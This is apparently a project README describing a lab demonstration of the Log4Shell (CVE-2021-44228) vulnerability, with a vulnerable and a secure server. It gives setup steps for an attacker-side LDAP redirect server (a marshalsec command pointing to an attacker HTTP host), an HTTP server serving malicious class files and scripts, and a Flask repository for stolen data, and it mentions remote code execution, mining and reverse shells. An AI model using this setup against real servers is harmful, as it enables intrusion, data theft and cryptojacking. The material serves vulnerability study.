This project demonstrate various possible attacks on an Application server using vulnerable version 2.15 (Officially labeled CVE-2021-44228) and known as "Log4Shell".We created an Attacker server and a Vulnerable server for demonstration.Attacker server contains a remote repository to store data from vulnerable server,an LDAP server which is used to redirect runtime from vulnerable application server and http server is used to download malicious scrips in vulnerable server.We performed remote code execution,mining and reverse shell.
Code contains Spring Boot Applications(Gradle and Maven).We need to Install IntelliJ IDEA 2021.3.3 (Ultimate Edition) to build and execute these Applications. Below are the steps to run the applications that demonstrate different components.
-
To Host Application Server
-Open Server Packages(Vulnerable and Secure) in IntelliJ and Perform Build(Gradle) for these Applications.
-Run Server Package using IntelliJ. -
To Host LDAP
-Open LDAP Host application in IntelliJ and perform Build(Maven).
-To execute the LDAP server use below command
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "<Attacker-HTTP-Server-IP>:<Attacker-HTTP-Server-Port>/#<RemoteCodeClassName>"
- To Host Attacker HTTP-Server
-python3 -m http.server <Attacker-HTTP-Server-Port>
- To Host Flask App for Attacker Remote Repository
-python3 remote_repository.py
Note:Attacker HTTP-Server will contain a Remote Java Class File along with some Shell Script which contains Remote Code that Attacker needs to execute on Vulnerable Server.